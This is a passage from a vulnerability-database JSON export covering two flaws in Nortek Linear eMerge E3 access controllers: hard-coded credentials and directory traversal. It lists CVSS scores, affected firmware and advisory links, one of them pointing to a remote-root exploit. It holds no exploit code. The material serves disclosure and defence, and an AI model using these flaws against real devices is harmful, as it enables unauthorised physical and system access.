"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7261",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7261",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34630",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-158696",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7261",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7261",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34630",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-102",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158696",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "VULHUB",
"id": "VHN-158696"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
},
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices have Hard-coded Credentials. Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to bypass authentication detection",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7261"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "VULHUB",
"id": "VHN-158696"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7261",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "155267",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-102",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34630",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158696",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "VULHUB",
"id": "VHN-158696"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
},
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"id": "VAR-201907-0162",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "VULHUB",
"id": "VHN-158696"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
}
]
},
"last_update_date": "2024-03-18T22:23:59.454000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "Use hard-coded credentials (CWE-798) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158696"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7261"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155267/nortek-linear-emerge-e3-access-controller-1.00-06-ssh-ftp-remote-root.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "VULHUB",
"id": "VHN-158696"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
},
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"db": "VULHUB",
"id": "VHN-158696"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
},
{
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158696"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-102"
},
{
"date": "2019-07-02T18:15:12.080000",
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34630"
},
{
"date": "2019-11-12T00:00:00",
"db": "VULHUB",
"id": "VHN-158696"
},
{
"date": "2024-03-07T08:20:00",
"db": "JVNDB",
"id": "JVNDB-2019-005914"
},
{
"date": "2019-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-102"
},
{
"date": "2022-10-14T01:20:26.870000",
"db": "NVD",
"id": "CVE-2019-7261"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to the use of hard-coded credentials in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005914"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-102"
}
],
"trust": 0.6
}
}
VAR-201907-0153
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow Directory Traversal. Linear eMerge E3 series devices contain a path traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security&ControlLineareMergeE3-Series is an access control device from Nortek Security & Control. A path traversal vulnerability exists in the LineareMergeE3-Series device due to a program that failed to properly process sequences such as \342\200\230../\342\200\231. An attacker could exploit the vulnerability to traverse the file system and access files or directories outside of the restrictions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0153",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": null,
"trust": 0.6,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"cve": "CVE-2019-7253",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7253",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-21272",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158688",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7253",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7253",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-21272",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-110",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158688",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "VULHUB",
"id": "VHN-158688"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-110"
},
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Directory Traversal. Linear eMerge E3 series devices contain a path traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security\u0026ControlLineareMergeE3-Series is an access control device from Nortek Security \u0026 Control. A path traversal vulnerability exists in the LineareMergeE3-Series device due to a program that failed to properly process sequences such as \\342\\200\\230../\\342\\200\\231. An attacker could exploit the vulnerability to traverse the file system and access files or directories outside of the restrictions",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7253"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "VULHUB",
"id": "VHN-158688"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7253",
"trust": 3.9
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-110",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-21272",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158688",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "VULHUB",
"id": "VHN-158688"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-110"
},
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"id": "VAR-201907-0153",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "VULHUB",
"id": "VHN-158688"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
}
]
},
"last_update_date": "2024-03-18T22:23:59.425000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.1
},
{
"problemtype": "Path traversal (CWE-22) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158688"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.3,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7253"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "VULHUB",
"id": "VHN-158688"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-110"
},
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"db": "VULHUB",
"id": "VHN-158688"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-110"
},
{
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158688"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-110"
},
{
"date": "2019-07-02T19:15:10.930000",
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
